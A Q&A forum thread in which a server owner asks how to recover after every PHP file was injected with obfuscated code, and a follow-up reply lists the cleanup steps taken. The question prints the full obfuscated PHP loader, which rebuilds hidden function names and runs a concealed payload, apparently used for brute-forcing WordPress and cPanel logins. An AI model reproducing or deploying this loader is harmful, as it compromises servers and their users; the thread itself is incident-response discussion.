What to do after php XSS attack?

Question

My server is infected with XSS attack. All of the php files (all of wordpress, my custom .php scripts and applications) have got injected with a similar type of encrypted code seen as below.

What is the course of action in a situation like this? I've read about preventing XSS but couldn't find a solid guide on what to do when already got attacked.

Also, I wonder is it possible to decrypt the injected php code below:

<?php $wwykwjmqa = '281Ld]245]K2]285]Ke]53Ldd/#)rrd/#00;quui#>.%!<***f  x27,*e  x27,*d  x27,*c  x27,*4<%j,,*!|  x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<7fw6<*K)ftpmdXA6|7**197*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!*#>m%:|:*r%:-t%)3of:opjudo%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]8^#zsfvr# x5cq%)ufttj x22)gj6<^#Y#    x5cq%   x27Y%6<.mif((function_exists("  x6f 1#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)mg%!)!gj!<2,*j%!-#1]#-bu,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r    x5c2^-%hOh/#00#W~!%t2-K)ebfsX   x27u%)7fmjix2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO   x22#)fepmqyfA>2b%!<*qp%d($n)-1);} @error_reporting(0); $effwexo :>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)*#j{hnpd#)tutjyf`opjudovg x22)!gj}56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hn   x7fw6*CW&)7gj6<*doj%7-C)fepmqz+sfwjidsb`bj+upcotn+qsvmt+fmhpph! x24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24*<!~!    x24/%t2w/   x24)##-!#~<)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>>!    x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eN+#Qi x5c1^W%c!>!%i#  x24#-!#]y38#-!%w:**<")));$dsngrwc d%6<pd%w6Z6<.4`hA x27pd%6<    x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x281]265]y72]254]y76#<!%w:!>!(%w:!>!    x246767~6<Cw6<pd%w6Z6<.5`hA x27p!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!os!osvufs}w;*    x7f!>>  x22!pd%)!gj}Z!-id%)uqpuft`msvd},;um!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-4]y8  x24-    x24]26  x24-    x2b x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%#<%tpz!>!#]D6M7]K3#<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!    x24/%tmw/   x24)%zW%h>EzH]672]48y]#>s%<#462]47y]252]18y]#>q%<qpuft`msvd}+;!>!}  x27;!>>>!}_;gvc%}&;ftmbg}   x7f;]53]Kc]55Ld]55#*<%bG9}:}.}6*CW&)7gj6<.[A    x27&6<  x7fw6*  x7f_*6<#o]1/20QUUI7jsv%7UFH#    x27rfs%6~6< x]},;osvufs}    x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]#/% x24-    x24!>!fyqmpef)# x24*<!%t::!y3f]51L3]84]y31M6]y3e]81 x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeob6<*msv%7-MSV,6<*)ujojR    x27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw5   x52 137 x41 107 x45 116 x54"]); if ((strstr($uas,"  x6d 163 x69 11~!<2p%    x7f!~!<##!>!2p%Z<^2 x5c8M7]381]211M5]67]452]88]5]48]32M3]316e"; function wfvpmkm($n){return chr(or323zbe!-#jt0*?]+^?]_  x5c}X   x24<!%tmw!>!#]#762]67y]562]38y]572]48y]dy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L8M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]23f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&by84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]25x24-   x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24-%yy>#]D6]281L1#/#M5]DgP5]D6#<%f#-bubE{h%)tpqsut>j%!*9!  x27!hmg%)!gj!~<ofmy%,3,j%>j%!<{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)d:!ftmf!}Z;^nbsbq%  x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utj7f<*X&Z&S{ftmfV   x7f<*XAZASV<*w%)pmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**1111276<C  x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%qp%)54l}   x27;%!<*#}_;#)323ldfid>}&;!osvufs}  x7f;!opjudo.uofuopD#)sfebfI{*w%)kVOBALS["   x61 156 x75 156 x6de#)tutjyf`4  x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!g28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=%!|!*)323zbek!~!<b%   x7f!<X>b%Z<#opobE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxc:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]W%c:>1<%b:>1<!gps)%j#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fj+{e%!osvufs!*!+A!>!{e%)!>>   x22!ftmbg)!gj<*#k#)usbut`cpV    x7f%j:>>1*!%b:>1<!fmtf!%b:>%s:  x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!-}!#*<%nfd>%fdy<Cb*[%h!>!= $haczumi("", $effwexo); $dg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-%tdz*Wsfuvso!%bss  x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:62    x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 xpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<72qj%6<^#zsfvr#   x5cqvg<~    x24<!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25      x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44e*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37ypd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppvufs!~<3,j%>j%!*3!    x27!h*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&97e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc1"]=1; $uas=strtolower($_SE=])0#)U!  x27{**u%-#jt0}Z;0]=]0#pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA   x2-2qj%7-K)udfoopdXA    x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB-*.%)euhA)3of>2bd%!<5h%/#0#/*#npS["  x61 156 x75 156 x61"])))) { $GL#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj  x22)gj!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<j;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:52fyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,45")) or (strstr($uas," x72 166 x3a 61  x31"))) { $haczumi = "  x63 1w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%r%7/7#@#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x5cq%7**)fubfsdXA   x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj36* x7f_*#fubfsdXk5`{66~6<&w6<|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`= implode(array_map("wfvpmkm",42   x5f 163 x74 141 x72 164") && (!isset($GLOBALsngrwc();}}vg}k~~9{d%:osvufs:~928>> x22:ftmbg39*x{**#k#)tutjyf`x    x22l:!}V;3q%}U;y]}R;27]445]212]445]43]321]464]284]364]6]234]342]58]24]31#7]y86]267]y74]275]y7:]268]y7f#<!%tww!>!    x2400~:<57ftbc  x7f!|!*uyfu x27kmsvd}R;*msv%)}.;`UQPMSVDh%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]sv`ftsbqA7>q%6<  x7fwppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,2njA    x27&6<.fmjgA    x27doj%6<   x7fw6*  x7f_*#fmjgk4`str_split("%tjw!>!#]y84]275]y83]248]y83]256]yxB%h>#]y31]278]y3e]81mjg}[;ldpt%}K;`ufldpt}X;`7pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fe7R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoFhopmA  x273qj%6<*Y%)fnbozcYufhA    x2)2q%l}S;2-u%!-#2#/#%#/#o]#/*) x7f x7f x7f<u%V x27{ftmfV   xRVER[" x48 124 x54 120 x5f 125 x53 10sTrREvxNoiTCnuf_EtaerCxECalPer_Rtszbpugxmqd'; $xadaat=explode(chr((833-713)),substr($wwykwjmqa,(40926-35049),(188-154))); $ghhrhvx = $xadaat[0]($xadaat[(6-5)]); $ohxwtrqt = $xadaat[0]($xadaat[(11-9)]); if (!function_exists('dulwdh')) { function dulwdh($xjtystpc, $ukgzlz,$luupugng) { $bzudlnhrz = NULL; for($gynqittgr=0;$gynqittgr<(sizeof($xjtystpc)/2);$gynqittgr++) { $bzudlnhrz .= substr($ukgzlz, $xjtystpc[($gynqittgr*2)],$xjtystpc[($gynqittgr*2)+(4-3)]); } return $luupugng(chr((55-46)),chr((294-202)),$bzudlnhrz); }; } $fjslgcupn = explode(chr((164-120)),'333,27,5103,47,4482,35,3015,26,4296,27,5840,37,1993,66,4769,67,3755,52,2126,39,579,41,5073,30,5558,45,1075,67,1002,26,4354,38,5649,49,2818,70,493,21,2888,49,1656,37,126,23,4392,58,4934,63,5750,33,3840,20,4882,52,284,49,5442,20,4997,29,733,30,5511,47,2624,50,4708,61,1924,69,1622,34,3373,49,5624,25,5359,24,1219,21,1548,48,1187,32,4596,62,1142,45,4098,24,404,24,3171,44,2570,54,2743,43,1240,49,862,43,149,54,650,34,2059,31,514,65,4450,32,24,53,1366,61,1864,60,763,33,3215,58,3807,33,4122,63,2354,60,3136,35,4517,43,5026,47,5336,23,2674,69,2937,55,5161,37,684,49,4046,52,3041,57,3422,60,5812,28,2786,32,5462,49,5698,52,2992,23,5198,38,1693,70,4323,31,5783,29,2165,41,2414,63,5288,48,5383,59,3098,38,3988,58,1512,36,2206,25,203,25,3860,67,2477,62,1823,41,1028,47,1342,24,77,49,796,66,1763,36,905,61,3927,61,3273,44,1447,65,428,65,4836,46,5603,21,4658,50,4185,45,1799,24,4230,66,1427,20,2539,31,2231,54,3317,36,0,24,1596,26,3566,25,228,56,2285,69,2090,36,5236,52,3682,44,3726,29,3353,20,620,30,3482,64,3546,20,4560,36,3619,63,1289,53,360,44,966,36,3591,28,5150,11'); $cagbthgj = $ghhrhvx("",dulwdh($fjslgcupn,$wwykwjmqa,$ohxwtrqt)); $ghhrhvx=$wwykwjmqa; $cagbthgj(""); $cagbthgj=(638-517); $wwykwjmqa=$cagbthgj-1; ?>

Just to understand what it does and where it got in?

Thanks in advance for all the help!

Answer 1

Ok, so wanted to share an update and close this. Here is what I did to overcome my server injection.

1) Wrote down a script which goes every php file and look for the injected code, if found removes it. (The injected code has similar beginning and ending pattern)

2) Changed passwords for server logins.

3) Updated very very old wordpress sites in the server.

Seems that this injected code was used for bruteforcing other wordpress & cpanels btw.